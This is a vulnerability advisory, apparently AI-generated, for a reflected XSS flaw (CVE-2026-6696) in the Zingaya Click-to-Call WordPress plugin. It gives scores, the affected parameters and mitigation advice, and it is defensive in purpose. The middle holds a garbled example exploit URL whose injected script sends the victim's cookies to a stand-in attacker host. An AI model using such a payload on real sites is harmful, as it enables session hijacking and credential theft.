
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-6696 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Zingaya Click-to-Call plugin for WordPress, affecting all versions up to and including 1.0. The flaw exists in the plugin's sign-up admin page, where the email, first_name, last_name, and phone parameters are not properly sanitized or escaped. It was published on May 5, 2026, and assigned a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient input sanitization and output escaping of user-supplied values (email, first_name, last_name, phone) on the plugin's sign-up admin page (zingaya-admin.php, lines 62, 71, 79, and 104). An unauthenticated attacker can craft a malicious URL containing injected JavaScript in these parameters; when a victim (such as a logged-in administrator) clicks the link, the script executes in their browser context. No authentication or special privileges are required by the attacker, but user interaction is necessary (GitHub Advisory, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of a victim who clicks a crafted link, with the script running in the context of the affected WordPress site. If the victim is an administrator, this can lead to session hijacking, credential theft, unauthorized administrative actions, malware distribution to site visitors, or data exfiltration from the WordPress installation. Availability is not directly impacted, but confidentiality and integrity are both at low risk per the CVSS assessment (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation as of the time of disclosure (Wordfence). The EPSS score is approximately 0.10–0.16%, indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (GitHub Advisory).
/wp-admin/admin.php?page=zingaya-click-to-call or similar, which renders the email, first_name, last_name, and phone parameters without sanitization.https://target.com/wp-admin/admin.php?page=zingaya-signup&email=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.email, first_name, last_name, or phone parameters (e.g., %3Cscript%3E).No patched version of the Zingaya Click-to-Call plugin beyond version 1.0 has been confirmed as available at the time of disclosure. Site administrators should disable or remove the plugin immediately if it is not actively required. If the plugin must remain active, restrict access to the sign-up admin page using server-level authentication controls and deploy a Web Application Firewall (WAF) with rules targeting XSS payloads in the affected parameters. Monitor the WordPress plugin repository and the vendor for any security updates (GitHub Advisory, Wordfence).
Wordfence reported this vulnerability as part of their weekly WordPress vulnerability intelligence reports for the weeks of May 4–10 and May 11–17, 2026, highlighting it among other plugin-level XSS issues (Wordfence Weekly May 4, Wordfence Weekly May 11). No notable independent researcher commentary or significant social media discussion beyond automated CVE tracking posts has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."